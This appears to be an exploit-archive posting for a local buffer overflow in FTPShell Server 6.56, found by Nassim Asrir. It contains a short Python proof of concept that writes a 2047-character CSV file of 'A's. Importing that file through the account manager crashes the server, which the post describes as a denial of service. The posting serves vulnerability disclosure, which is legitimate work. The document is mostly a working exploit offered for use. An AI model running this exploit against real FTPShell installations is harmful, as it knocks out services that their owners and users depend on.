FTPShell Server 6.56 Import CSV Buffer Overflow

FTPShell Server version 6.56 import CSV buffer overflow denial of service exploit.


MD5 | d5ef6fb552dd21d15219d37b998314cd

[+] Title: FTPShell Server 6.56 - Import CSV Buffer Overflow
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: N/A

Vendor:
===============

www.ftpshell.com


Download:
===========

http://www.ftpshell.com/download.htm


Vulnerability Type:
===================

Local Buffer Overflow.


POC:
======
Dos = "A"*2047
file=open("C:\\shell.csv","w")
file.write(Dos)
file.close()

1 - Manage FTP Accounts => Import From CSV = > Browse and import shell.csv = > Click in Import and Crashed :).

CVE Reference:
===============

N/A


Tested on:
===============

Windows 7

Win xp





Related Posts